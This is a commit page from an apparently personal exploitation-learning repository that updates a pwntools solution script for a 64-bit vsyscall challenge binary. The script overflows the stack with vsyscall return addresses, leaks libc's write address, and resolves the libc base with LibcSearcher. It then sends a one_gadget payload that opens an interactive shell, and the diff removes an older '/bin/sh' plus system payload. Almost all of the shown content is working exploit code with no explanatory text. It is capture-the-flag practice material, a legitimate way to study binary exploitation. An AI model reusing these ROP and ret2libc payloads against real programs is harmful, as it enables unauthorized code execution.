bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated VSyscall/vul64

Browse Source
This commit is contained in:
Jack Ren
2022-01-28 12:25:41 +08:00
parent 1d1b1ffec2
commit 3ae93c035e
1 changed files with 3 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
VSyscall/vul64/answer.py
View File

@@ -8,18 +8,13 @@ import time
import struct import struct
context(arch = "amd64",os = "linux", log_level = "debug") context(arch = "amd64",os = "linux", log_level = "debug")
# context.log_level = "debug"
p = process('./vul64') p = process('./vul64')
elf = ELF('./vul64') elf = ELF('./vul64')
#gdb.attach(p, "break *0x0000555555554a2b") # gdb.attach(p, "")
#time.sleep(10)
ret_addr = 0xffffffffff600400 ret_addr = 0xffffffffff600400
with open('input.txt', 'w') as f:
f.write(p64(ret_addr) * 30 + '\x2c')
p.send(p64(ret_addr) * 30 + '\x2c') p.send(p64(ret_addr) * 30 + '\x2c')
p.recvuntil("I have a gift for yoooou\n") p.recvuntil("I have a gift for yoooou\n")
write_libc = u64(p.recv(8)) write_libc = u64(p.recv(8))
@@ -27,8 +22,7 @@ p.recvuntil("Want my flag? Keep going!\n")
libc = LibcSearcher('write', write_libc) libc = LibcSearcher('write', write_libc)
libc_base = write_libc - libc.dump('write') libc_base = write_libc - libc.dump('write')
system_libc = libc_base + 0x4f3d5 # one_gadget Shift one_gadget_libc = libc_base + 0x4f3d5 # one_gadget Shift
p.send('0' * 0x33 + '\x47' + p64(one_gadget_libc) + '\n')
p.send("/bin/sh\x00" + '0' * 0x2f + p32(0x44) + p64(system_libc) + '\n')
p.interactive() p.interactive()